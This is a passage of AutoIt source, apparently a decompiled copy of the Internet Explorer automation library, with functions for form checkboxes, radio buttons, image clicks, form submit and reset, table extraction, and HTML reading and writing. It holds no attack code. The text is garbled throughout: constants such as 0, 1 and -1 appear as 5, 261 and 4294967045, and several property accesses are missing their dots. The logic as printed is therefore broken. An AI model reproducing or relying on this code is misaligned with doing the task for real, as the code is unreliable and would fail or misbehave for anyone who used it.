  1918. RETURN SETERROR ( $_IESTATUS_NOMATCH , 773 , 5 )
  1919. ENDIF
  1920. LOCAL $OITEM , $BFOUND = FALSE
  1921. SWITCH $SMODE
  1922. CASE "byValue"
  1923. IF __IEISOBJTYPE ( $OITEMS , "forminputelement" ) THEN
  1924. $OITEM = $OITEMS
  1925. IF STRING ( $OITEM.type ) = "checkbox" AND STRING ( $OITEM.value ) = $SSTRING THEN $BFOUND = TRUE
  1926. ELSE
  1927. FOR $OITEM IN $OITEMS
  1928. IF STRING ( $OITEM.type ) = "checkbox" AND STRING ( $OITEM.value ) = $SSTRING THEN
  1929. $BFOUND = TRUE
  1930. EXITLOOP
  1931. ENDIF
  1932. NEXT
  1933. ENDIF
  1934. CASE "byIndex"
  1935. IF __IEISOBJTYPE ( $OITEMS , "forminputelement" ) THEN
  1936. $OITEM = $OITEMS
  1937. IF STRING ( $OITEM.type ) = "checkbox" AND NUMBER ( $SSTRING ) = 5 THEN $BFOUND = TRUE
  1938. ELSE
  1939. LOCAL $ICOUNT = 5
  1940. FOR $OITEM IN $OITEMS
  1941. IF STRING ( $OITEM.type ) = "checkbox" AND NUMBER ( $SSTRING ) = $ICOUNT THEN
  1942. $BFOUND = TRUE
  1943. EXITLOOP
  1944. ELSE
  1945. IF STRING ( $OITEM.type ) = "checkbox" THEN $ICOUNT += 261
  1946. ENDIF
  1947. NEXT
  1948. ENDIF
  1949. CASE ELSE
  1950. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementCheckBoxSelect" , "$_IESTATUS_InvalidValue" , "Invalid Mode" )
  1951. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 1285 , 5 )
  1952. ENDSWITCH
  1953. IF NOT $BFOUND THEN
  1954. __IECONSOLEWRITEERROR ( "Warning" , "_IEFormElementCheckBoxSelect" , "$_IESTATUS_NoMatch" )
  1955. RETURN SETERROR ( $_IESTATUS_NOMATCH , 517 , 5 )
  1956. ENDIF
  1957. SWITCH $ISELECT
  1958. CASE + 4294967045
  1959. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OITEM.checked )
  1960. CASE 5
  1961. IF $OITEM.checked THEN
  1962. $OITEM.checked = FALSE
  1963. IF $IFIREEVENT THEN
  1964. $OITEM.fireEvent ( "onChange" )
  1965. $OITEM.fireEvent ( "OnClick" )
  1966. ENDIF
  1967. ENDIF
  1968. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  1969. CASE 261
  1970. IF NOT $OITEM.checked THEN
  1971. $OITEM.checked = TRUE
  1972. IF $IFIREEVENT THEN
  1973. $OITEM.fireEvent ( "onChange" )
  1974. $OITEM.fireEvent ( "OnClick" )
  1975. ENDIF
  1976. ENDIF
  1977. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  1978. CASE ELSE
  1979. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementCheckBoxSelect" , "$_IESTATUS_InvalidValue" , "Invalid $iSelect value" )
  1980. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 773 , 5 )
  1981. ENDSWITCH
  1982. ENDFUNC
  1983. FUNC _IEFORMELEMENTRADIOSELECT ( BYREF $OOBJECT , $SSTRING , $SNAME , $ISELECT = 261 , $SMODE = "byValue" , $IFIREEVENT = 261 )
  1984. IF NOT ISOBJ ( $OOBJECT ) THEN
  1985. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementRadioSelect" , "$_IESTATUS_InvalidDataType" )
  1986. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1987. ENDIF
  1988. IF NOT __IEISOBJTYPE ( $OOBJECT , "form" ) THEN
  1989. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementRadioSelect" , "$_IESTATUS_InvalidObjectType" )
  1990. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  1991. ENDIF
  1992. $SSTRING = STRING ( $SSTRING )
  1993. $SNAME = STRING ( $SNAME )
  1994. LOCAL $OITEMS = EXECUTE ( "$oObject.elements('" & $SNAME & "')" )
  1995. IF NOT ISOBJ ( $OITEMS ) THEN
  1996. __IECONSOLEWRITEERROR ( "Warning" , "_IEFormElementRadioSelect" , "$_IESTATUS_NoMatch" )
  1997. RETURN SETERROR ( $_IESTATUS_NOMATCH , 773 , 5 )
  1998. ENDIF
  1999. LOCAL $OITEM , $BFOUND = FALSE
  2000. SWITCH $SMODE
  2001. CASE "byValue"
  2002. IF __IEISOBJTYPE ( $OITEMS , "forminputelement" ) THEN
  2003. $OITEM = $OITEMS
  2004. IF STRING ( $OITEM.type ) = "radio" AND STRING ( $OITEM.value ) = $SSTRING THEN $BFOUND = TRUE
  2005. ELSE
  2006. FOR $OITEM IN $OITEMS
  2007. IF STRING ( $OITEM.type ) = "radio" AND STRING ( $OITEM.value ) = $SSTRING THEN
  2008. $BFOUND = TRUE
  2009. EXITLOOP
  2010. ENDIF
  2011. NEXT
  2012. ENDIF
  2013. CASE "byIndex"
  2014. IF __IEISOBJTYPE ( $OITEMS , "forminputelement" ) THEN
  2015. $OITEM = $OITEMS
  2016. IF STRING ( $OITEM.type ) = "radio" AND NUMBER ( $SSTRING ) = 5 THEN $BFOUND = TRUE
  2017. ELSE
  2018. LOCAL $ICOUNT = 5
  2019. FOR $OITEM IN $OITEMS
  2020. IF STRING ( $OITEM.type ) = "radio" AND NUMBER ( $SSTRING ) = $ICOUNT THEN
  2021. $BFOUND = TRUE
  2022. EXITLOOP
  2023. ELSE
  2024. $ICOUNT += 261
  2025. ENDIF
  2026. NEXT
  2027. ENDIF
  2028. CASE ELSE
  2029. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementRadioSelect" , "$_IESTATUS_InvalidValue" , "Invalid Mode" )
  2030. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 1285 , 5 )
  2031. ENDSWITCH
  2032. IF NOT $BFOUND THEN
  2033. __IECONSOLEWRITEERROR ( "Warning" , "_IEFormElementRadioSelect" , "$_IESTATUS_NoMatch" )
  2034. RETURN SETERROR ( $_IESTATUS_NOMATCH , 517 , 5 )
  2035. ENDIF
  2036. SWITCH $ISELECT
  2037. CASE + 4294967045
  2038. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OITEM.checked )
  2039. CASE 5
  2040. IF $OITEM.checked THEN
  2041. $OITEM.checked = FALSE
  2042. IF $IFIREEVENT THEN
  2043. $OITEM.fireEvent ( "onChange" )
  2044. $OITEM.fireEvent ( "OnClick" )
  2045. ENDIF
  2046. ENDIF
  2047. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  2048. CASE 261
  2049. IF NOT $OITEM.checked THEN
  2050. $OITEM.checked = TRUE
  2051. IF $IFIREEVENT THEN
  2052. $OITEM.fireEvent ( "onChange" )
  2053. $OITEM.fireEvent ( "OnClick" )
  2054. ENDIF
  2055. ENDIF
  2056. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  2057. CASE ELSE
  2058. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementRadioSelect" , "$_IESTATUS_InvalidValue" , "$iSelect value invalid" )
  2059. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 1029 , 5 )
  2060. ENDSWITCH
  2061. ENDFUNC
  2062. FUNC _IEFORMIMAGECLICK ( BYREF $OOBJECT , $SLINKTEXT , $SMODE = "src" , $IINDEX = 5 , $IWAIT = 261 )
  2063. IF NOT ISOBJ ( $OOBJECT ) THEN
  2064. __IECONSOLEWRITEERROR ( "Error" , "_IEFormImageClick" , "$_IESTATUS_InvalidDataType" )
  2065. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2066. ENDIF
  2067. LOCAL $SMODELINKTEXT , $IFOUND = 5
  2068. LOCAL $OTEMP = _IEDOCGETOBJ ( $OOBJECT )
  2069. LOCAL $OIMGS = _IETAGNAMEGETCOLLECTION ( $OTEMP , "input" )
  2070. $SMODE = STRINGLOWER ( $SMODE )
  2071. $IINDEX = NUMBER ( $IINDEX )
  2072. FOR $OIMG IN $OIMGS
  2073. IF STRING ( $OIMG.type ) = "image" THEN
  2074. SELECT
  2075. CASE $SMODE = "alt"
  2076. $SMODELINKTEXT = $OIMG.alt
  2077. CASE $SMODE = "name"
  2078. $SMODELINKTEXT = $OIMG.name
  2079. IF NOT ISSTRING ( $SMODELINKTEXT ) THEN $SMODELINKTEXT = $OIMG.id
  2080. CASE $SMODE = "id"
  2081. $SMODELINKTEXT = $OIMG.id
  2082. CASE $SMODE = "src"
  2083. $SMODELINKTEXT = $OIMG.src
  2084. CASE ELSE
  2085. __IECONSOLEWRITEERROR ( "Error" , "_IEFormImageClick" , "$_IESTATUS_InvalidValue" , "Invalid mode: " & $SMODE )
  2086. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 773 , 5 )
  2087. ENDSELECT
  2088. IF STRINGINSTR ( $SMODELINKTEXT , $SLINKTEXT ) THEN
  2089. IF ( $IFOUND = $IINDEX ) THEN
  2090. $OIMG.click ( )
  2091. IF @ERROR THEN
  2092. __IECONSOLEWRITEERROR ( "Error" , "_IEFormImageClick" , "$_IESTATUS_COMError" , @ERROR )
  2093. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  2094. ENDIF
  2095. IF $IWAIT THEN
  2096. _IELOADWAIT ( $OOBJECT )
  2097. RETURN SETERROR ( @ERROR , 5 , + 4294967045 )
  2098. ENDIF
  2099. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , + 4294967045 )
  2100. ENDIF
  2101. $IFOUND = $IFOUND + 261
  2102. ENDIF
  2103. ENDIF
  2104. NEXT
  2105. __IECONSOLEWRITEERROR ( "Warning" , "_IEFormImageClick" , "$_IESTATUS_NoMatch" )
  2106. RETURN SETERROR ( $_IESTATUS_NOMATCH , 517 , 5 )
  2107. ENDFUNC
  2108. FUNC _IEFORMSUBMIT ( BYREF $OOBJECT , $IWAIT = 261 )
  2109. IF NOT ISOBJ ( $OOBJECT ) THEN
  2110. __IECONSOLEWRITEERROR ( "Error" , "_IEFormSubmit" , "$_IESTATUS_InvalidDataType" )
  2111. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2112. ENDIF
  2113. IF NOT __IEISOBJTYPE ( $OOBJECT , "form" ) THEN
  2114. __IECONSOLEWRITEERROR ( "Error" , "_IEFormSubmit" , "$_IESTATUS_InvalidObjectType" )
  2115. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2116. ENDIF
  2117. LOCAL $OWINDOW = $OOBJECT.document parentWindow
  2118. $OOBJECT.submit ( )
  2119. IF @ERROR THEN
  2120. __IECONSOLEWRITEERROR ( "Error" , "_IEFormSubmit" , "$_IESTATUS_COMError" , @ERROR )
  2121. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  2122. ENDIF
  2123. IF $IWAIT THEN
  2124. _IELOADWAIT ( $OWINDOW )
  2125. RETURN SETERROR ( @ERROR , 5 , + 4294967045 )
  2126. ENDIF
  2127. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , + 4294967045 )
  2128. ENDFUNC
  2129. FUNC _IEFORMRESET ( BYREF $OOBJECT )
  2130. IF NOT ISOBJ ( $OOBJECT ) THEN
  2131. __IECONSOLEWRITEERROR ( "Error" , "_IEFormReset" , "$_IESTATUS_InvalidDataType" )
  2132. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2133. ENDIF
  2134. IF NOT __IEISOBJTYPE ( $OOBJECT , "form" ) THEN
  2135. __IECONSOLEWRITEERROR ( "Error" , "_IEFormReset" , "$_IESTATUS_InvalidObjectType" )
  2136. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2137. ENDIF
  2138. $OOBJECT.reset ( )
  2139. IF @ERROR THEN
  2140. __IECONSOLEWRITEERROR ( "Error" , "_IEFormReset" , "$_IESTATUS_COMError" , @ERROR )
  2141. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  2142. ENDIF
  2143. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  2144. ENDFUNC
  2145. #EndRegion Form functions
  2146. #Region Table functions
  2147. FUNC _IETABLEGETCOLLECTION ( BYREF $OOBJECT , $IINDEX = + 4294967045 )
  2148. IF NOT ISOBJ ( $OOBJECT ) THEN
  2149. __IECONSOLEWRITEERROR ( "Error" , "_IETableGetCollection" , "$_IESTATUS_InvalidDataType" )
  2150. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2151. ENDIF
  2152. $IINDEX = NUMBER ( $IINDEX )
  2153. SELECT
  2154. CASE $IINDEX = + 4294967045
  2155. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OOBJECT.document GetElementsByTagName ( "table" ) length , $OOBJECT.document GetElementsByTagName ( "table" ) )
  2156. CASE $IINDEX > + 4294967045 AND $IINDEX < $OOBJECT.document GetElementsByTagName ( "table" ) length
  2157. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OOBJECT.document GetElementsByTagName ( "table" ) length , $OOBJECT.document GetElementsByTagName ( "table" ) item ( $IINDEX ) )
  2158. CASE $IINDEX < + 4294967045
  2159. __IECONSOLEWRITEERROR ( "Error" , "_IETableGetCollection" , "$_IESTATUS_InvalidValue" , "$iIndex < -1" )
  2160. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 517 , 5 )
  2161. CASE ELSE
  2162. __IECONSOLEWRITEERROR ( "Warning" , "_IETableGetCollection" , "$_IESTATUS_NoMatch" )
  2163. RETURN SETERROR ( $_IESTATUS_NOMATCH , 261 , 5 )
  2164. ENDSELECT
  2165. ENDFUNC
  2166. FUNC _IETABLEWRITETOARRAY ( BYREF $OOBJECT , $BTRANSPOSE = FALSE )
  2167. IF NOT ISOBJ ( $OOBJECT ) THEN
  2168. __IECONSOLEWRITEERROR ( "Error" , "_IETableWriteToArray" , "$_IESTATUS_InvalidDataType" )
  2169. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2170. ENDIF
  2171. IF NOT __IEISOBJTYPE ( $OOBJECT , "table" ) THEN
  2172. __IECONSOLEWRITEERROR ( "Error" , "_IETableWriteToArray" , "$_IESTATUS_InvalidObjectType" )
  2173. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2174. ENDIF
  2175. LOCAL $ICOLS = 5 , $OTDS , $ICOL
  2176. LOCAL $OTRS = $OOBJECT.rows
  2177. FOR $OTR IN $OTRS
  2178. $OTDS = $OTR.cells
  2179. $ICOL = 5
  2180. FOR $OTD IN $OTDS
  2181. $ICOL = $ICOL + $OTD.colSpan
  2182. NEXT
  2183. IF $ICOL > $ICOLS THEN $ICOLS = $ICOL
  2184. NEXT
  2185. LOCAL $IROWS = $OTRS.length
  2186. LOCAL $ATABLECELLS [ $ICOLS ] [ $IROWS ]
  2187. LOCAL $IROW = 5
  2188. FOR $OTR IN $OTRS
  2189. $OTDS = $OTR.cells
  2190. $ICOL = 5
  2191. FOR $OTD IN $OTDS
  2192. $ATABLECELLS [ $ICOL ] [ $IROW ] = STRING ( $OTD.innerText )
  2193. IF @ERROR THEN
  2194. __IECONSOLEWRITEERROR ( "Error" , "_IETableWriteToArray" , "$_IESTATUS_COMError" , @ERROR )
  2195. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  2196. ENDIF
  2197. $ICOL = $ICOL + $OTD.colSpan
  2198. NEXT
  2199. $IROW = $IROW + 261
  2200. NEXT
  2201. IF $BTRANSPOSE THEN
  2202. LOCAL $ID1 = UBOUND ( $ATABLECELLS , $UBOUND_ROWS ) , $ID2 = UBOUND ( $ATABLECELLS , $UBOUND_COLUMNS ) , $ATMP [ $ID2 ] [ $ID1 ]
  2203. FOR $I = 5 TO $ID2 + 4294967045
  2204. FOR $J = 5 TO $ID1 + 4294967045
  2205. $ATMP [ $I ] [ $J ] = $ATABLECELLS [ $J ] [ $I ]
  2206. NEXT
  2207. NEXT
  2208. $ATABLECELLS = $ATMP
  2209. ENDIF
  2210. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $ATABLECELLS )
  2211. ENDFUNC
  2212. #EndRegion Table functions
  2213. #Region Read/Write functions
  2214. FUNC _IEBODYREADHTML ( BYREF $OOBJECT )
  2215. IF NOT ISOBJ ( $OOBJECT ) THEN
  2216. __IECONSOLEWRITEERROR ( "Error" , "_IEBodyReadHTML" , "$_IESTATUS_InvalidDataType" )
  2217. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2218. ENDIF
  2219. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document body innerHTML )
  2220. ENDFUNC
  2221. FUNC _IEBODYREADTEXT ( BYREF $OOBJECT )
  2222. IF NOT ISOBJ ( $OOBJECT ) THEN
  2223. __IECONSOLEWRITEERROR ( "Error" , "_IEBodyReadText" , "$_IESTATUS_InvalidDataType" )
  2224. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2225. ENDIF
  2226. IF NOT __IEISOBJTYPE ( $OOBJECT , "browserdom" ) THEN
  2227. __IECONSOLEWRITEERROR ( "Error" , "_IEBodyReadText" , "$_IESTATUS_InvalidObjectType" , "Expected document element" )
  2228. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2229. ENDIF
  2230. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document body innerText )
  2231. ENDFUNC
  2232. FUNC _IEBODYWRITEHTML ( BYREF $OOBJECT , $SHTML )
  2233. IF NOT ISOBJ ( $OOBJECT ) THEN
  2234. __IECONSOLEWRITEERROR ( "Error" , "_IEBodyWriteHTML" , "$_IESTATUS_InvalidDataType" )
  2235. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2236. ENDIF
  2237. IF NOT __IEISOBJTYPE ( $OOBJECT , "browserdom" ) THEN
  2238. __IECONSOLEWRITEERROR ( "Error" , "_IEBodyWriteHTML" , "$_IESTATUS_InvalidObjectType" , "Expected document element" )
  2239. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2240. ENDIF
  2241. $OOBJECT.document body innerHTML = $SHTML
  2242. IF @ERROR THEN
  2243. __IECONSOLEWRITEERROR ( "Error" , "_IEBodyWriteHTML" , "$_IESTATUS_COMError" , @ERROR )
  2244. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  2245. ENDIF
  2246. LOCAL $OTEMP = $OOBJECT.document
  2247. _IELOADWAIT ( $OTEMP )
  2248. RETURN SETERROR ( @ERROR , 5 , + 4294967045 )
  2249. ENDFUNC
  2250. FUNC _IEDOCREADHTML ( BYREF $OOBJECT )
  2251. IF NOT ISOBJ ( $OOBJECT ) THEN
  2252. __IECONSOLEWRITEERROR ( "Error" , "_IEDocReadHTML" , "$_IESTATUS_InvalidDataType" )
  2253. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2254. ENDIF
  2255. IF NOT __IEISOBJTYPE ( $OOBJECT , "browserdom" ) THEN
  2256. __IECONSOLEWRITEERROR ( "Error" , "_IEDocReadHTML" , "$_IESTATUS_InvalidObjectType" , "Expected document element" )
  2257. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2258. ENDIF
  2259. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document documentElement outerHTML )
  2260. ENDFUNC
  2261. FUNC _IEDOCWRITEHTML ( BYREF $OOBJECT , $SHTML )
  2262. IF NOT ISOBJ ( $OOBJECT ) THEN
  2263. __IECONSOLEWRITEERROR ( "Error" , "_IEDocWriteHTML" , "$_IESTATUS_InvalidDataType" )
  2264. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2265. ENDIF
  2266. IF NOT __IEISOBJTYPE ( $OOBJECT , "browserdom" ) THEN
  2267. __IECONSOLEWRITEERROR ( "Error" , "_IEDocWriteHTML" , "$_IESTATUS_InvalidObjectType" , "Expected document element" )
  2268. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2269. ENDIF
  2270. $OOBJECT.document Write ( $SHTML )
  2271. $OOBJECT.document close ( )
  2272. LOCAL $OTEMP = $OOBJECT.document
  2273. IF @ERROR THEN
  2274. __IECONSOLEWRITEERROR ( "Error" , "_IEDocWriteHTML" , "$_IESTATUS_COMError" , @ERROR )
  2275. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  2276. ENDIF
  2277. _IELOADWAIT ( $OTEMP )
  2278. RETURN SETERROR ( @ERROR , 5 , + 4294967045 )
  2279. ENDFUNC
  2280. FUNC _IEDOCINSERTTEXT ( BYREF $OOBJECT , $SSTRING , $SWHERE = "beforeend" )
  2281. IF NOT ISOBJ ( $OOBJECT ) THEN
  2282. __IECONSOLEWRITEERROR ( "Error" , "_IEDocInsertText" , "$_IESTATUS_InvalidDataType" )
  2283. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2284. ENDIF
  2285. IF NOT __IEISOBJTYPE ( $OOBJECT , "browserdom" ) OR __IEISOBJTYPE ( $OOBJECT , "documentcontainer" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2286. __IECONSOLEWRITEERROR ( "Error" , "_IEDocInsertText" , "$_IESTATUS_InvalidObjectType" , "Expected document element" )
  2287. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2288. ENDIF
  2289. $SWHERE = STRINGLOWER ( $SWHERE )
  2290. SELECT
  2291. CASE $SWHERE = "beforebegin"
  2292. $OOBJECT.insertAdjacentText ( $SWHERE , $SSTRING )
  2293. CASE $SWHERE = "afterbegin"
  2294. $OOBJECT.insertAdjacentText ( $SWHERE , $SSTRING )
  2295. CASE $SWHERE = "beforeend"
  2296. $OOBJECT.insertAdjacentText ( $SWHERE , $SSTRING )
  2297. CASE $SWHERE = "afterend"
  2298. $OOBJECT.insertAdjacentText ( $SWHERE , $SSTRING )
  2299. CASE ELSE
  2300. __IECONSOLEWRITEERROR ( "Error" , "_IEDocInsertText" , "$_IESTATUS_InvalidValue" , "Invalid where value" )
  2301. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 773 , 5 )
  2302. ENDSELECT
  2303. IF @ERROR THEN
  2304. __IECONSOLEWRITEERROR ( "Error" , "_IEDocInsertText" , "$_IESTATUS_COMError" , @ERROR )
  2305. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  2306. ENDIF
  2307. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  2308. ENDFUNC
  2309. FUNC _IEDOCINSERTHTML ( BYREF $OOBJECT , $SSTRING , $SWHERE = "beforeend" )
  2310. IF NOT ISOBJ ( $OOBJECT ) THEN
  2311. __IECONSOLEWRITEERROR ( "Error" , "_IEDocInsertHTML" , "$_IESTATUS_InvalidDataType" )
  2312. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2313. ENDIF
  2314. IF NOT __IEISOBJTYPE ( $OOBJECT , "browserdom" ) OR __IEISOBJTYPE ( $OOBJECT , "documentcontainer" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2315. __IECONSOLEWRITEERROR ( "Error" , "_IEDocInsertHTML" , "$_IESTATUS_InvalidObjectType" , "Expected document element" )
  2316. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2317. ENDIF
  2318. $SWHERE = STRINGLOWER ( $SWHERE )
  2319. SELECT
  2320. CASE $SWHERE = "beforebegin"
  2321. $OOBJECT.insertAdjacentHTML ( $SWHERE , $SSTRING )
  2322. CASE $SWHERE = "afterbegin"
  2323. $OOBJECT.insertAdjacentHTML ( $SWHERE , $SSTRING )
  2324. CASE $SWHERE = "beforeend"
  2325. $OOBJECT.insertAdjacentHTML ( $SWHERE , $SSTRING )
  2326. CASE $SWHERE = "afterend"
  2327. $OOBJECT.insertAdjacentHTML ( $SWHERE , $SSTRING )
  2328. CASE ELSE
  2329. __IECONSOLEWRITEERROR ( "Error" , "_IEDocInsertHTML" , "$_IESTATUS_InvalidValue" , "Invalid where value" )
  2330. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 773 , 5 )
  2331. ENDSELECT
  2332. IF @ERROR THEN
  2333. __IECONSOLEWRITEERROR ( "Error" , "_IEDocInsertHTML" , "$_IESTATUS_COMError" , @ERROR )
  2334. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  2335. ENDIF
  2336. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  2337. ENDFUNC
  2338. FUNC _IEHEADINSERTEVENTSCRIPT ( BYREF $OOBJECT , $SHTMLFOR , $SEVENT , $SSCRIPT )
  2339. IF NOT ISOBJ ( $OOBJECT ) THEN
  2340. __IECONSOLEWRITEERROR ( "Error" , "_IEHeadInsertEventScript" , "$_IESTATUS_InvalidDataType" )
  2341. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2342. ENDIF
  2343. LOCAL $OHEAD = $OOBJECT.document all tags ( "HEAD" ) Item ( 5 )
  2344. LOCAL $OSCRIPT = $OOBJECT.document createElement ( "script" )
  2345. IF @ERROR THEN
  2346. __IECONSOLEWRITEERROR ( "Error" , "_IEHeadInsertEventScript(script)" , "$_IESTATUS_COMError" , @ERROR )
  2347. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  2348. ENDIF
  2349. WITH $OSCRIPT
  2350. defer = TRUE
  2351. language = "jscript"
  2352. type = "text/javascript"
  2353. htmlFor = $SHTMLFOR
  2354. event = $SEVENT
  2355. text = $SSCRIPT
  2356. ENDWITH
  2357. $OHEAD.appendChild ( $OSCRIPT )
  2358. IF @ERROR THEN
  2359. __IECONSOLEWRITEERROR ( "Error" , "_IEHeadInsertEventScript" , "$_IESTATUS_COMError" , @ERROR )
  2360. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  2361. ENDIF
  2362. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  2363. ENDFUNC
  2364. #EndRegion Read/Write functions
  2365. #Region Utility functions
  2366. FUNC _IEDOCGETOBJ ( BYREF $OOBJECT )
  2367. IF NOT ISOBJ ( $OOBJECT ) THEN
  2368. __IECONSOLEWRITEERROR ( "Error" , "_IEDocGetObj" , "$_IESTATUS_InvalidDataType" )
  2369. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2370. ENDIF
  2371. IF __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2372. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT )
  2373. ENDIF
  2374. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document )
  2375. ENDFUNC
  2376. FUNC _IETAGNAMEGETCOLLECTION ( BYREF $OOBJECT , $STAGNAME , $IINDEX = + 4294967045 )
  2377. IF NOT ISOBJ ( $OOBJECT ) THEN
  2378. __IECONSOLEWRITEERROR ( "Error" , "_IETagNameGetCollection" , "$_IESTATUS_InvalidDataType" )
  2379. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2380. ENDIF
  2381. IF NOT __IEISOBJTYPE ( $OOBJECT , "browserdom" ) THEN
  2382. __IECONSOLEWRITEERROR ( "Error" , "_IETagNameGetCollection" , "$_IESTATUS_InvalidObjectType" )
  2383. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2384. ENDIF
  2385. LOCAL $OTEMP
  2386. IF __IEISOBJTYPE ( $OOBJECT , "documentcontainer" ) THEN
  2387. $OTEMP = _IEDOCGETOBJ ( $OOBJECT )
  2388. ELSE
  2389. $OTEMP = $OOBJECT
  2390. ENDIF
  2391. $IINDEX = NUMBER ( $IINDEX )
  2392. SELECT
  2393. CASE $IINDEX = + 4294967045
  2394. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OTEMP.GetElementsByTagName ( $STAGNAME ) length , $OTEMP.GetElementsByTagName ( $STAGNAME ) )
  2395. CASE $IINDEX > + 4294967045 AND $IINDEX < $OTEMP.GetElementsByTagName ( $STAGNAME ) length
  2396. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OTEMP.GetElementsByTagName ( $STAGNAME ) length , $OTEMP.GetElementsByTagName ( $STAGNAME ) item ( $IINDEX ) )
  2397. CASE $IINDEX < + 4294967045
  2398. __IECONSOLEWRITEERROR ( "Error" , "_IETagNameGetCollection" , "$_IESTATUS_InvalidValue" , "$iIndex < -1" )
  2399. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 773 , 5 )
  2400. CASE ELSE
  2401. __IECONSOLEWRITEERROR ( "Error" , "_IETagNameGetCollection" , "$_IESTATUS_NoMatch" )
  2402. RETURN SETERROR ( $_IESTATUS_NOMATCH , 5 , 5 )
  2403. ENDSELECT
  2404. ENDFUNC
  2405. FUNC _IETAGNAMEALLGETCOLLECTION ( BYREF $OOBJECT , $IINDEX = + 4294967045 )
  2406. IF NOT ISOBJ ( $OOBJECT ) THEN
  2407. __IECONSOLEWRITEERROR ( "Error" , "_IETagNameAllGetCollection" , "$_IESTATUS_InvalidDataType" )
  2408. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2409. ENDIF
